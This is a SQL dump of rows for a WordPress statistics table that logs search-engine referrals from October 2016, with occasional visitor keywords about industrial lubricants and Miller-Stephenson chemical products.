INSERT INTO `wp_statistics_search` VALUES (124, '2016-10-05', 'google', 'www.google.com', '', 383); 
INSERT INTO `wp_statistics_search` VALUES (125, '2016-10-05', 'google', 'www.google.it', '', 384); 
INSERT INTO `wp_statistics_search` VALUES (126, '2016-10-05', 'google', 'www.google.com', '', 386); 
INSERT INTO `wp_statistics_search` VALUES (127, '2016-10-05', 'google', 'www.google.com', '', 387); 
INSERT INTO `wp_statistics_search` VALUES (128, '2016-10-05', 'google', 'www.google.com', '', 388); 
INSERT INTO `wp_statistics_search` VALUES (129, '2016-10-05', 'google', 'www.google.co.uk', '', 389); 
INSERT INTO `wp_statistics_search` VALUES (130, '2016-10-05', 'google', 'www.google.com', '', 391); 
INSERT INTO `wp_statistics_search` VALUES (131, '2016-10-05', 'bing', 'www.bing.com', '', 392); 
INSERT INTO `wp_statistics_search` VALUES (132, '2016-10-05', 'google', 'www.google.co.uk', '', 393); 
INSERT INTO `wp_statistics_search` VALUES (133, '2016-10-05', 'google', 'www.google.ca', '', 397); 
INSERT INTO `wp_statistics_search` VALUES (134, '2016-10-05', 'google', 'www.google.com', '', 398); 
INSERT INTO `wp_statistics_search` VALUES (135, '2016-10-05', 'google', 'www.google.ca', '', 399); 
INSERT INTO `wp_statistics_search` VALUES (136, '2016-10-05', 'google', 'www.google.com', '', 400); 
INSERT INTO `wp_statistics_search` VALUES (137, '2016-10-05', 'google', 'www.google.com', '', 401); 
INSERT INTO `wp_statistics_search` VALUES (138, '2016-10-05', 'google', 'www.google.com', '', 402); 
INSERT INTO `wp_statistics_search` VALUES (139, '2016-10-05', 'google', 'www.google.co.kr', '', 405); 
INSERT INTO `wp_statistics_search` VALUES (140, '2016-10-05', 'google', 'www.google.com', '', 409); 
INSERT INTO `wp_statistics_search` VALUES (141, '2016-10-05', 'bing', 'www.bing.com', '', 410); 
INSERT INTO `wp_statistics_search` VALUES (142, '2016-10-05', 'google', 'www.google.co.in', '', 411); 
INSERT INTO `wp_statistics_search` VALUES (143, '2016-10-05', 'google', 'www.google.com', '', 416); 
INSERT INTO `wp_statistics_search` VALUES (144, '2016-10-05', 'google', 'www.google.com', '', 417); 
INSERT INTO `wp_statistics_search` VALUES (145, '2016-10-05', 'google', 'www.google.com.mx', '', 418); 
INSERT INTO `wp_statistics_search` VALUES (146, '2016-10-05', 'google', 'www.google.ca', '', 421); 
INSERT INTO `wp_statistics_search` VALUES (147, '2016-10-05', 'google', 'www.google.com.mx', '', 422); 
INSERT INTO `wp_statistics_search` VALUES (148, '2016-10-05', 'google', 'www.google.com', '', 423); 
INSERT INTO `wp_statistics_search` VALUES (149, '2016-10-05', 'google', 'www.google.co.in', '', 424); 
INSERT INTO `wp_statistics_search` VALUES (150, '2016-10-05', 'google', 'www.google.com', '', 425); 
INSERT INTO `wp_statistics_search` VALUES (151, '2016-10-05', 'google', 'www.google.ca', '', 427); 
INSERT INTO `wp_statistics_search` VALUES (152, '2016-10-05', 'google', 'www.google.com', '', 428); 
INSERT INTO `wp_statistics_search` VALUES (153, '2016-10-05', 'google', 'www.google.com', '', 430); 
INSERT INTO `wp_statistics_search` VALUES (154, '2016-10-05', 'google', 'www.google.com', '', 433); 
INSERT INTO `wp_statistics_search` VALUES (155, '2016-10-05', 'google', 'www.google.com', '', 434); 
INSERT INTO `wp_statistics_search` VALUES (156, '2016-10-05', 'bing', 'www.bing.com', '', 436); 
INSERT INTO `wp_statistics_search` VALUES (157, '2016-10-05', 'google', 'www.google.com', '', 440); 
INSERT INTO `wp_statistics_search` VALUES (158, '2016-10-05', 'google', 'www.google.com', '', 441); 
INSERT INTO `wp_statistics_search` VALUES (159, '2016-10-05', 'google', 'www.google.com', '', 446); 
INSERT INTO `wp_statistics_search` VALUES (160, '2016-10-05', 'google', 'www.google.com', '', 448); 
INSERT INTO `wp_statistics_search` VALUES (161, '2016-10-05', 'google', 'www.google.com', '', 450); 
INSERT INTO `wp_statistics_search` VALUES (162, '2016-10-05', 'google', 'www.google.com', '', 451); 
INSERT INTO `wp_statistics_search` VALUES (163, '2016-10-05', 'google', 'www.google.com', '', 452); 
INSERT INTO `wp_statistics_search` VALUES (164, '2016-10-05', 'google', 'www.google.com', '', 454); 
INSERT INTO `wp_statistics_search` VALUES (165, '2016-10-05', 'google', 'www.google.com', '', 456); 
INSERT INTO `wp_statistics_search` VALUES (166, '2016-10-05', 'google', 'www.google.com', '', 458); 
INSERT INTO `wp_statistics_search` VALUES (167, '2016-10-05', 'google', 'www.google.com', '', 460); 
INSERT INTO `wp_statistics_search` VALUES (168, '2016-10-05', 'google', 'www.google.com', '', 461); 
INSERT INTO `wp_statistics_search` VALUES (169, '2016-10-05', 'bing', 'www.bing.com', 'Dry lubricant MS -122 SDS', 462); 
INSERT INTO `wp_statistics_search` VALUES (170, '2016-10-05', 'google', 'www.google.com', '', 465); 
INSERT INTO `wp_statistics_search` VALUES (171, '2016-10-05', 'google', 'www.google.ca', '', 469); 
INSERT INTO `wp_statistics_search` VALUES (172, '2016-10-05', 'google', 'www.google.com', '', 470); 
INSERT INTO `wp_statistics_search` VALUES (173, '2016-10-05', 'google', 'www.google.com', '', 471); 
INSERT INTO `wp_statistics_search` VALUES (174, '2016-10-05', 'google', 'www.google.com', '', 472); 
INSERT INTO `wp_statistics_search` VALUES (175, '2016-10-05', 'google', 'www.google.com', 'where can i get food grade oil', 473); 
INSERT INTO `wp_statistics_search` VALUES (176, '2016-10-05', 'google', 'www.google.com', '', 474); 
INSERT INTO `wp_statistics_search` VALUES (177, '2016-10-05', 'google', 'www.google.com', '', 475); 
INSERT INTO `wp_statistics_search` VALUES (178, '2016-10-05', 'google', 'www.google.com', '', 477); 
INSERT INTO `wp_statistics_search` VALUES (179, '2016-10-05', 'google', 'www.google.com.ph', '', 478); 
INSERT INTO `wp_statistics_search` VALUES (180, '2016-10-05', 'google', 'www.google.com', '', 480); 
INSERT INTO `wp_statistics_search` VALUES (181, '2016-10-05', 'google', 'www.google.com', '', 482); 
INSERT INTO `wp_statistics_search` VALUES (182, '2016-10-05', 'google', 'www.google.com', '', 485); 
INSERT INTO `wp_statistics_search` VALUES (183, '2016-10-05', 'google', 'www.google.com', '', 492); 
INSERT INTO `wp_statistics_search` VALUES (184, '2016-10-05', 'google', 'www.google.cl', '', 495); 
INSERT INTO `wp_statistics_search` VALUES (185, '2016-10-05', 'google', 'www.google.ca', '', 497); 
INSERT INTO `wp_statistics_search` VALUES (186, '2016-10-05', 'google', 'www.google.com.mx', '', 500); 
INSERT INTO `wp_statistics_search` VALUES (187, '2016-10-05', 'google', 'www.google.com', '', 501); 
INSERT INTO `wp_statistics_search` VALUES (188, '2016-10-05', 'google', 'www.google.com', '', 502); 
INSERT INTO `wp_statistics_search` VALUES (189, '2016-10-05', 'google', 'www.google.ca', '', 503); 
INSERT INTO `wp_statistics_search` VALUES (190, '2016-10-05', 'google', 'www.google.com', '', 504); 
INSERT INTO `wp_statistics_search` VALUES (191, '2016-10-05', 'google', 'www.google.com', '', 505); 
INSERT INTO `wp_statistics_search` VALUES (192, '2016-10-05', 'google', 'www.google.com', '', 509); 
INSERT INTO `wp_statistics_search` VALUES (193, '2016-10-05', 'google', 'www.google.com', '', 511); 
INSERT INTO `wp_statistics_search` VALUES (194, '2016-10-05', 'google', 'www.google.com', '', 512); 
INSERT INTO `wp_statistics_search` VALUES (195, '2016-10-05', 'google', 'www.google.com', '', 513); 
INSERT INTO `wp_statistics_search` VALUES (196, '2016-10-05', 'google', 'www.google.com', '', 515); 
INSERT INTO `wp_statistics_search` VALUES (197, '2016-10-05', 'bing', 'www.bing.com', '', 516); 
INSERT INTO `wp_statistics_search` VALUES (198, '2016-10-05', 'google', 'www.google.com', '', 519); 
INSERT INTO `wp_statistics_search` VALUES (199, '2016-10-05', 'google', 'www.google.ca', '', 520); 
INSERT INTO `wp_statistics_search` VALUES (200, '2016-10-05', 'bing', 'www.bing.com', 'MILLER STEPHENSON CHEMICAL COMPANY', 521); 
INSERT INTO `wp_statistics_search` VALUES (201, '2016-10-05', 'google', 'www.google.com', '', 522); 
INSERT INTO `wp_statistics_search` VALUES (202, '2016-10-05', 'google', 'www.google.com', '', 523); 
INSERT INTO `wp_statistics_search` VALUES (203, '2016-10-05', 'google', 'www.google.ca', '', 525); 
INSERT INTO `wp_statistics_search` VALUES (204, '2016-10-05', 'google', 'www.google.com', '', 526); 
INSERT INTO `wp_statistics_search` VALUES (205, '2016-10-05', 'google', 'www.google.com', '', 528); 
INSERT INTO `wp_statistics_search` VALUES (206, '2016-10-05', 'bing', 'www.bing.com', 'miller stephenson epoxy 907', 529); 
INSERT INTO `wp_statistics_search` VALUES (207, '2016-10-05', 'google', 'www.google.com', '', 532); 
INSERT INTO `wp_statistics_search` VALUES (208, '2016-10-05', 'google', 'www.google.com', '', 533); 
INSERT INTO `wp_statistics_search` VALUES (209, '2016-10-05', 'bing', 'www.bing.com', 'Heloxy 48', 534); 
INSERT INTO `wp_statistics_search` VALUES (210, '2016-10-05', 'google', 'www.google.com', '', 535); 
INSERT INTO `wp_statistics_search` VALUES (211, '2016-10-05', 'google', 'www.google.com', '', 536); 
INSERT INTO `wp_statistics_search` VALUES (212, '2016-10-05', 'google', 'www.google.com', '', 544); 
INSERT INTO `wp_statistics_search` VALUES (213, '2016-10-05', 'google', 'www.google.com', '', 545); 
INSERT INTO `wp_statistics_search` VALUES (214, '2016-10-05', 'bing', 'www.bing.com', 'miller stephenson', 549); 
INSERT INTO `wp_statistics_search` VALUES (215, '2016-10-05', 'google', 'www.google.com', '', 550); 
INSERT INTO `wp_statistics_search` VALUES (216, '2016-10-05', 'google', 'www.google.com', '', 551); 
INSERT INTO `wp_statistics_search` VALUES (217, '2016-10-05', 'bing', 'www.bing.com', 'miller stephenson', 553); 
INSERT INTO `wp_statistics_search` VALUES (218, '2016-10-05', 'google', 'www.google.com', '', 555); 
INSERT INTO `wp_statistics_search` VALUES (219, '2016-10-05', 'google', 'www.google.com', '', 556); 
INSERT INTO `wp_statistics_search` VALUES (220, '2016-10-05', 'google', 'www.google.ca', '', 557); 
INSERT INTO `wp_statistics_search` VALUES (221, '2016-10-05', 'google', 'www.google.com', '', 559); 
INSERT INTO `wp_statistics_search` VALUES (222, '2016-10-05', 'google', 'www.google.com', '', 560); 
INSERT INTO `wp_statistics_search` VALUES (223, '2016-10-05', 'google', 'www.google.com', '', 562); 
INSERT INTO `wp_statistics_search` VALUES (224, '2016-10-05', 'google', 'www.google.com', '', 568); 
INSERT INTO `wp_statistics_search` VALUES (225, '2016-10-05', 'google', 'www.google.com', '', 570); 
INSERT INTO `wp_statistics_search` VALUES (226, '2016-10-05', 'google', 'www.google.com', '', 572); 
INSERT INTO `wp_statistics_search` VALUES (227, '2016-10-05', 'google', 'www.google.com', '', 574); 
INSERT INTO `wp_statistics_search` VALUES (228, '2016-10-05', 'google', 'www.google.com', '', 598); 
INSERT INTO `wp_statistics_search` VALUES (229, '2016-10-05', 'google', 'www.google.com', '', 607); 
INSERT INTO `wp_statistics_search` VALUES (230, '2016-10-06', 'google', 'www.google.com', '', 614); 
INSERT INTO `wp_statistics_search` VALUES (231, '2016-10-06', 'google', 'www.google.com', '', 615); 
INSERT INTO `wp_statistics_search` VALUES (232, '2016-10-06', 'google', 'www.google.com', '', 618); 
INSERT INTO `wp_statistics_search` VALUES (233, '2016-10-06', 'google', 'www.google.com', '', 626); 
INSERT INTO `wp_statistics_search` VALUES (234, '2016-10-06', 'google', 'www.google.com', '', 628); 
INSERT INTO `wp_statistics_search` VALUES (235, '2016-10-06', 'bing', 'www.bing.com', 'release agent', 632); 
INSERT INTO `wp_statistics_search` VALUES (236, '2016-10-06', 'bing', 'www.bing.com', 'MILLER STEPHENSON', 633); 
INSERT INTO `wp_statistics_search` VALUES (237, '2016-10-06', 'google', 'www.google.com', '', 635); 
INSERT INTO `wp_statistics_search` VALUES (238, '2016-10-06', 'google', 'www.google.co.kr', '', 639); 
INSERT INTO `wp_statistics_search` VALUES (239, '2016-10-06', 'google', 'www.google.com', '', 641); 
INSERT INTO `wp_statistics_search` VALUES (240, '2016-10-06', 'google', 'www.google.co.th', '', 646); 
INSERT INTO `wp_statistics_search` VALUES (241, '2016-10-06', 'google', 'www.google.com', '', 650); 
INSERT INTO `wp_statistics_search` VALUES (242, '2016-10-06', 'google', 'www.google.co.th', '', 652); 
INSERT INTO `wp_statistics_search` VALUES (243, '2016-10-06', 'google', 'www.google.co.jp', '', 653); 
INSERT INTO `wp_statistics_search` VALUES (244, '2016-10-06', 'google', 'www.google.com.hk', '', 656); 
INSERT INTO `wp_statistics_search` VALUES (245, '2016-10-06', 'google', 'www.google.com', '', 657); 
INSERT INTO `wp_statistics_search` VALUES (246, '2016-10-06', 'google', 'www.google.com', '', 658); 
INSERT INTO `wp_statistics_search` VALUES (247, '2016-10-06', 'google', 'www.google.co.in', '', 662); 
INSERT INTO `wp_statistics_search` VALUES (248, '2016-10-06', 'google', 'www.google.com', '', 667); 
INSERT INTO `wp_statistics_search` VALUES (249, '2016-10-06', 'google', 'www.google.com', '', 670); 
INSERT INTO `wp_statistics_search` VALUES (250, '2016-10-06', 'google', 'www.google.ca', '', 677); 
INSERT INTO `wp_statistics_search` VALUES (251, '2016-10-06', 'google', 'www.google.com', '', 679); 
INSERT INTO `wp_statistics_search` VALUES (252, '2016-10-06', 'google', 'www.google.com', '', 681); 
INSERT INTO `wp_statistics_search` VALUES (253, '2016-10-06', 'google', 'www.google.co.in', '', 682); 
INSERT INTO `wp_statistics_search` VALUES (254, '2016-10-06', 'google', 'www.google.co.in', '', 683); 
INSERT INTO `wp_statistics_search` VALUES (255, '2016-10-06', 'google', 'www.google.co.th', '', 686); 
INSERT INTO `wp_statistics_search` VALUES (256, '2016-10-06', 'google', 'www.google.co.th', '', 687); 
INSERT INTO `wp_statistics_search` VALUES (257, '2016-10-06', 'google', 'www.google.com.sg', '', 688); 
INSERT INTO `wp_statistics_search` VALUES (258, '2016-10-06', 'google', 'www.google.co.kr', '', 691); 
INSERT INTO `wp_statistics_search` VALUES (259, '2016-10-06', 'google', 'www.google.co.in', '', 696); 
INSERT INTO `wp_statistics_search` VALUES (260, '2016-10-06', 'duckduckgo', 'duckduckgo.com', '', 698); 
INSERT INTO `wp_statistics_search` VALUES (261, '2016-10-06', 'google', 'www.google.rs', '', 700); 
INSERT INTO `wp_statistics_search` VALUES (262, '2016-10-06', 'google', 'www.google.co.uk', '', 707); 
INSERT INTO `wp_statistics_search` VALUES (263, '2016-10-06', 'google', 'www.google.com.tr', '', 708); 
INSERT INTO `wp_statistics_search` VALUES (264, '2016-10-06', 'bing', 'www.bing.com', '', 719); 
INSERT INTO `wp_statistics_search` VALUES (265, '2016-10-06', 'google', 'www.google.com', '', 722); 
INSERT INTO `wp_statistics_search` VALUES (266, '2016-10-06', 'google', 'www.google.mu', '', 724); 
INSERT INTO `wp_statistics_search` VALUES (267, '2016-10-06', 'google', 'www.google.com', '', 725); 
INSERT INTO `wp_statistics_search` VALUES (268, '2016-10-06', 'google', 'www.google.com', '', 727); 
INSERT INTO `wp_statistics_search` VALUES (269, '2016-10-06', 'google', 'www.google.co.uk', '', 731); 
INSERT INTO `wp_statistics_search` VALUES (270, '2016-10-06', 'google', 'www.google.com.lb', '', 733); 
INSERT INTO `wp_statistics_search` VALUES (271, '2016-10-06', 'google', 'www.google.co.in', '', 735); 
INSERT INTO `wp_statistics_search` VALUES (272, '2016-10-06', 'google', 'www.google.com.pk', '', 740); 
INSERT INTO `wp_statistics_search` VALUES (273, '2016-10-06', 'google', 'www.google.pl', '', 742); 
INSERT INTO `wp_statistics_search` VALUES (274, '2016-10-06', 'google', 'www.google.com.hk', '', 746); 
INSERT INTO `wp_statistics_search` VALUES (275, '2016-10-06', 'google', 'www.google.pl', '', 748); 
INSERT INTO `wp_statistics_search` VALUES (276, '2016-10-06', 'google', 'www.google.de', '', 749); 
INSERT INTO `wp_statistics_search` VALUES (277, '2016-10-06', 'google', 'www.google.de', '', 750); 
INSERT INTO `wp_statistics_search` VALUES (278, '2016-10-06', 'google', 'www.google.com', '', 754); 
INSERT INTO `wp_statistics_search` VALUES (279, '2016-10-06', 'google', 'www.google.be', '', 756); 
INSERT INTO `wp_statistics_search` VALUES (280, '2016-10-06', 'google', 'www.google.com', '', 758); 
INSERT INTO `wp_statistics_search` VALUES (281, '2016-10-06', 'google', 'www.google.com', '', 759); 
INSERT INTO `wp_statistics_search` VALUES (282, '2016-10-06', 'google', 'www.google.com', '', 760); 
INSERT INTO `wp_statistics_search` VALUES (283, '2016-10-06', 'google', 'www.google.be', '', 761); 
INSERT INTO `wp_statistics_search` VALUES (284, '2016-10-06', 'google', 'www.google.de', '', 765); 
INSERT INTO `wp_statistics_search` VALUES (285, '2016-10-06', 'google', 'www.google.com', '', 768); 
INSERT INTO `wp_statistics_search` VALUES (286, '2016-10-06', 'google', 'www.google.com', '', 775); 
INSERT INTO `wp_statistics_search` VALUES (287, '2016-10-06', 'google', 'www.google.co.in', '', 776); 
INSERT INTO `wp_statistics_search` VALUES (288, '2016-10-06', 'google', 'www.google.ca', '', 781); 
INSERT INTO `wp_statistics_search` VALUES (289, '2016-10-06', 'google', 'www.google.com', '', 791); 
INSERT INTO `wp_statistics_search` VALUES (290, '2016-10-06', 'google', 'www.google.com', '', 794); 
INSERT INTO `wp_statistics_search` VALUES (291, '2016-10-06', 'google', 'www.google.com', '', 798); 
INSERT INTO `wp_statistics_search` VALUES (292, '2016-10-06', 'google', 'www.google.ca', '', 804); 
INSERT INTO `wp_statistics_search` VALUES (293, '2016-10-06', 'google', 'www.google.com', '', 805); 
INSERT INTO `wp_statistics_search` VALUES (294, '2016-10-06', 'google', 'www.google.com', '', 813); 
INSERT INTO `wp_statistics_search` VALUES (295, '2016-10-06', 'google', 'www.google.de', '', 814); 
INSERT INTO `wp_statistics_search` VALUES (296, '2016-10-06', 'google', 'www.google.com', '', 817); 
INSERT INTO `wp_statistics_search` VALUES (297, '2016-10-06', 'google', 'www.google.com', '', 819); 
INSERT INTO `wp_statistics_search` VALUES (298, '2016-10-06', 'google', 'www.google.com', '', 820); 
INSERT INTO `wp_statistics_search` VALUES (299, '2016-10-06', 'google', 'www.google.com', '', 822); 
INSERT INTO `wp_statistics_search` VALUES (300, '2016-10-06', 'google', 'www.google.co.th', '', 829); 
INSERT INTO `wp_statistics_search` VALUES (301, '2016-10-06', 'google', 'www.google.co.uk', '', 830); 
INSERT INTO `wp_statistics_search` VALUES (302, '2016-10-06', 'google', 'www.google.com', '', 831); 
INSERT INTO `wp_statistics_search` VALUES (303, '2016-10-06', 'google', 'www.google.it', '', 832); 
INSERT INTO `wp_statistics_search` VALUES (304, '2016-10-06', 'bing', 'www.bing.com', '', 833); 
INSERT INTO `wp_statistics_search` VALUES (305, '2016-10-06', 'google', 'www.google.com', '', 835); 
INSERT INTO `wp_statistics_search` VALUES (306, '2016-10-06', 'google', 'www.google.com', '', 838); 
INSERT INTO `wp_statistics_search` VALUES (307, '2016-10-06', 'bing', 'www.bing.com', 'miller stephenson', 841); 
INSERT INTO `wp_statistics_search` VALUES (308, '2016-10-06', 'google', 'www.google.com', '', 850); 
INSERT INTO `wp_statistics_search` VALUES (309, '2016-10-06', 'google', 'www.google.com', '', 852); 
INSERT INTO `wp_statistics_search` VALUES (310, '2016-10-06', 'google', 'www.google.com', '', 853); 
INSERT INTO `wp_statistics_search` VALUES (311, '2016-10-06', 'google', 'www.google.com', '', 854); 
INSERT INTO `wp_statistics_search` VALUES (312, '2016-10-06', 'google', 'www.google.com', '', 855); 
INSERT INTO `wp_statistics_search` VALUES (313, '2016-10-06', 'google', 'www.google.com', '', 857); 
INSERT INTO `wp_statistics_search` VALUES (314, '2016-10-06', 'google', 'www.google.ca', '', 858); 
INSERT INTO `wp_statistics_search` VALUES (315, '2016-10-06', 'google', 'www.google.com', '', 861); 
INSERT INTO `wp_statistics_search` VALUES (316, '2016-10-06', 'google', 'www.google.com', '', 862); 
INSERT INTO `wp_statistics_search` VALUES (317, '2016-10-06', 'google', 'www.google.com', '', 864); 
INSERT INTO `wp_statistics_search` VALUES (318, '2016-10-06', 'google', 'www.google.com', '', 866); 
INSERT INTO `wp_statistics_search` VALUES (319, '2016-10-06', 'google', 'www.google.com', '', 868); 
INSERT INTO `wp_statistics_search` VALUES (320, '2016-10-06', 'google', 'www.google.es', '', 870); 
INSERT INTO `wp_statistics_search` VALUES (321, '2016-10-06', 'google', 'www.google.co.uk', '', 871); 
INSERT INTO `wp_statistics_search` VALUES (322, '2016-10-06', 'google', 'www.google.com', 'content', 877); 
INSERT INTO `wp_statistics_search` VALUES (323, '2016-10-06', 'google', 'www.google.com', '', 878); 
INSERT INTO `wp_statistics_search` VALUES (324, '2016-10-06', 'google', 'www.google.com', '', 879); 
INSERT INTO `wp_statistics_search` VALUES (325, '2016-10-06', 'google', 'www.google.com', '', 881); 
INSERT INTO `wp_statistics_search` VALUES (326, '2016-10-06', 'google', 'www.google.com', '', 883); 
INSERT INTO `wp_statistics_search` VALUES (327, '2016-10-06', 'yandex', 'yandex.ru', '', 885); 
INSERT INTO `wp_statistics_search` VALUES (328, '2016-10-06', 'google', 'www.google.com', '', 887); 
INSERT INTO `wp_statistics_search` VALUES (329, '2016-10-06', 'google', 'www.google.com', '', 889); 
INSERT INTO `wp_statistics_search` VALUES (330, '2016-10-06', 'google', 'www.google.com', '', 892); 
INSERT INTO `wp_statistics_search` VALUES (331, '2016-10-06', 'google', 'www.google.com', '', 894); 
INSERT INTO `wp_statistics_search` VALUES (332, '2016-10-06', 'google', 'www.google.com', '', 896); 
INSERT INTO `wp_statistics_search` VALUES (333, '2016-10-06', 'google', 'www.google.com', '', 897); 
INSERT INTO `wp_statistics_search` VALUES (334, '2016-10-06', 'google', 'www.google.com', '', 898); 
INSERT INTO `wp_statistics_search` VALUES (335, '2016-10-06', 'bing', 'www.bing.com', 'krytox 240AC technical data', 901); 
INSERT INTO `wp_statistics_search` VALUES (336, '2016-10-06', 'google', 'www.google.com', '', 904); 
INSERT INTO `wp_statistics_search` VALUES (337, '2016-10-06', 'google', 'www.google.com.eg', '', 905); 
INSERT INTO `wp_statistics_search` VALUES (338, '2016-10-06', 'google', 'www.google.com', '', 908); 
INSERT INTO `wp_statistics_search` VALUES (339, '2016-10-06', 'google', 'www.google.com', '', 910); 
INSERT INTO `wp_statistics_search` VALUES (340, '2016-10-06', 'google', 'www.google.ca', '', 911); 
INSERT INTO `wp_statistics_search` VALUES (341, '2016-10-06', 'google', 'www.google.ca', '', 912); 
INSERT INTO `wp_statistics_search` VALUES (342, '2016-10-06', 'bing', 'www.bing.com', '', 913); 
INSERT INTO `wp_statistics_search` VALUES (343, '2016-10-06', 'google', 'www.google.com', '', 914); 
INSERT INTO `wp_statistics_search` VALUES (344, '2016-10-06', 'google', 'www.google.com', '', 915); 
INSERT INTO `wp_statistics_search` VALUES (345, '2016-10-06', 'yahoo', 'r.search.yahoo.com', '', 922); 
INSERT INTO `wp_statistics_search` VALUES (346, '2016-10-06', 'google', 'www.google.com', '', 924); 
INSERT INTO `wp_statistics_search` VALUES (347, '2016-10-06', 'google', 'www.google.com', '', 926); 
INSERT INTO `wp_statistics_search` VALUES (348, '2016-10-06', 'google', 'www.google.se', '', 927); 
INSERT INTO `wp_statistics_search` VALUES (349, '2016-10-06', 'yahoo', 'search.yahoo.com', '', 928); 
INSERT INTO `wp_statistics_search` VALUES (350, '2016-10-06', 'bing', 'www.bing.com', 'miller- stephephenson PTFE Release agent dry lubrication msds sheets', 929); 
INSERT INTO `wp_statistics_search` VALUES (351, '2016-10-06', 'google', 'www.google.com', '', 930); 
INSERT INTO `wp_statistics_search` VALUES (352, '2016-10-06', 'bing', 'www.bing.com', '', 933); 
INSERT INTO `wp_statistics_search` VALUES (353, '2016-10-06', 'google', 'www.google.com.mx', '', 935); 
INSERT INTO `wp_statistics_search` VALUES (354, '2016-10-06', 'google', 'www.google.com', '', 936); 
INSERT INTO `wp_statistics_search` VALUES (355, '2016-10-06', 'bing', 'www.bing.com', 'miller stephenson', 937); 
INSERT INTO `wp_statistics_search` VALUES (356, '2016-10-06', 'google', 'www.google.com', '', 942); 
INSERT INTO `wp_statistics_search` VALUES (357, '2016-10-06', 'google', 'www.google.com', '', 943); 
INSERT INTO `wp_statistics_search` VALUES (358, '2016-10-06', 'google', 'www.google.ca', '', 952); 
INSERT INTO `wp_statistics_search` VALUES (359, '2016-10-06', 'google', 'www.google.com', '', 955); 
INSERT INTO `wp_statistics_search` VALUES (360, '2016-10-06', 'google', 'www.google.ca', '', 957); 
INSERT INTO `wp_statistics_search` VALUES (361, '2016-10-06', 'google', 'www.google.com', '', 958); 
INSERT INTO `wp_statistics_search` VALUES (362, '2016-10-06', 'google', 'www.google.com', '', 961); 
INSERT INTO `wp_statistics_search` VALUES (363, '2016-10-06', 'google', 'www.google.com', '', 963); 
INSERT INTO `wp_statistics_search` VALUES (364, '2016-10-06', 'google', 'www.google.com', '', 966); 
INSERT INTO `wp_statistics_search` VALUES (365, '2016-10-06', 'google', 'www.google.com.mx', '', 967); 
INSERT INTO `wp_statistics_search` VALUES (366, '2016-10-06', 'google', 'www.google.com', '', 968); 
INSERT INTO `wp_statistics_search` VALUES (367, '2016-10-06', 'google', 'www.google.com.mx', '', 969); 
INSERT INTO `wp_statistics_search` VALUES (368, '2016-10-06', 'google', 'www.google.com', '', 977); 
INSERT INTO `wp_statistics_search` VALUES (369, '2016-10-06', 'google', 'www.google.com', '', 978); 
INSERT INTO `wp_statistics_search` VALUES (370, '2016-10-06', 'yahoo', 'r.search.yahoo.com', '', 979); 
INSERT INTO `wp_statistics_search` VALUES (371, '2016-10-06', 'bing', 'www.bing.com', '', 983); 
INSERT INTO `wp_statistics_search` VALUES (372, '2016-10-06', 'google', 'www.google.com', '', 984); 
INSERT INTO `wp_statistics_search` VALUES (373, '2016-10-06', 'google', 'www.google.com', '', 986); 
INSERT INTO `wp_statistics_search` VALUES (374, '2016-10-06', 'google', 'www.google.com', '', 987); 
INSERT INTO `wp_statistics_search` VALUES (375, '2016-10-06', 'google', 'www.google.ca', '', 989); 
INSERT INTO `wp_statistics_search` VALUES (376, '2016-10-06', 'google', 'www.google.com', '', 990); 
INSERT INTO `wp_statistics_search` VALUES (377, '2016-10-06', 'google', 'www.google.com', '', 992); 
INSERT INTO `wp_statistics_search` VALUES (378, '2016-10-06', 'bing', 'www.bing.com', 'miller stephenson chemical', 994); 
INSERT INTO `wp_statistics_search` VALUES (379, '2016-10-06', 'google', 'www.google.com', '', 995); 
INSERT INTO `wp_statistics_search` VALUES (380, '2016-10-06', 'google', 'www.google.com', '', 996); 
INSERT INTO `wp_statistics_search` VALUES (381, '2016-10-06', 'google', 'www.google.com', '', 997); 
INSERT INTO `wp_statistics_search` VALUES (382, '2016-10-06', 'google', 'www.google.com', '', 1010); 
INSERT INTO `wp_statistics_search` VALUES (383, '2016-10-06', 'bing', 'www.bing.com', 'miller stephenson chemical', 1012); 
INSERT INTO `wp_statistics_search` VALUES (384, '2016-10-06', 'google', 'www.google.com', '', 1013); 
INSERT INTO `wp_statistics_search` VALUES (385, '2016-10-06', 'google', 'www.google.com', '', 1015); 
INSERT INTO `wp_statistics_search` VALUES (386, '2016-10-06', 'google', 'www.google.com', '', 1016); 
INSERT INTO `wp_statistics_search` VALUES (387, '2016-10-06', 'google', 'www.google.com', '', 1018); 
INSERT INTO `wp_statistics_search` VALUES (388, '2016-10-06', 'google', 'www.google.com.br', '', 1025); 
INSERT INTO `wp_statistics_search` VALUES (389, '2016-10-06', 'google', 'www.google.com', '', 1028); 
INSERT INTO `wp_statistics_search` VALUES (390, '2016-10-06', 'google', 'www.google.com', '', 1029); 
INSERT INTO `wp_statistics_search` VALUES (391, '2016-10-06', 'google', 'www.google.com', '', 1031); 
INSERT INTO `wp_statistics_search` VALUES (392, '2016-10-06', 'google', 'www.google.com', '', 1032); 
INSERT INTO `wp_statistics_search` VALUES (393, '2016-10-06', 'google', 'www.google.com', '', 1034); 
INSERT INTO `wp_statistics_search` VALUES (394, '2016-10-06', 'google', 'www.google.com', '', 1039); 
INSERT INTO `wp_statistics_search` VALUES (395, '2016-10-06', 'google', 'www.google.com', '', 1040); 
INSERT INTO `wp_statistics_search` VALUES (396, '2016-10-06', 'google', 'www.google.ca', '', 1041); 
INSERT INTO `wp_statistics_search` VALUES (397, '2016-10-06', 'google', 'www.google.com', '', 1043); 
INSERT INTO `wp_statistics_search` VALUES (398, '2016-10-06', 'google', 'www.google.com', '', 1044); 
INSERT INTO `wp_statistics_search` VALUES (399, '2016-10-06', 'google', 'www.google.com', '', 1045); 
INSERT INTO `wp_statistics_search` VALUES (400, '2016-10-06', 'google', 'www.google.com', '', 1046); 
INSERT INTO `wp_statistics_search` VALUES (401, '2016-10-06', 'google', 'www.google.com', '', 1051); 
INSERT INTO `wp_statistics_search` VALUES (402, '2016-10-06', 'google', 'www.google.com', '', 1063); 
INSERT INTO `wp_statistics_search` VALUES (403, '2016-10-06', 'bing', 'www.bing.com', '', 1065); 
INSERT INTO `wp_statistics_search` VALUES (404, '2016-10-06', 'google', 'www.google.com', '', 1067); 
INSERT INTO `wp_statistics_search` VALUES (405, '2016-10-06', 'bing', 'www.bing.com', '', 1071); 
INSERT INTO `wp_statistics_search` VALUES (406, '2016-10-06', 'yahoo', 'search.yahoo.com', '', 1073); 
INSERT INTO `wp_statistics_search` VALUES (407, '2016-10-06', 'google', 'www.google.com', '', 1076); 
INSERT INTO `wp_statistics_search` VALUES (408, '2016-10-06', 'google', 'www.google.com', '', 1077); 
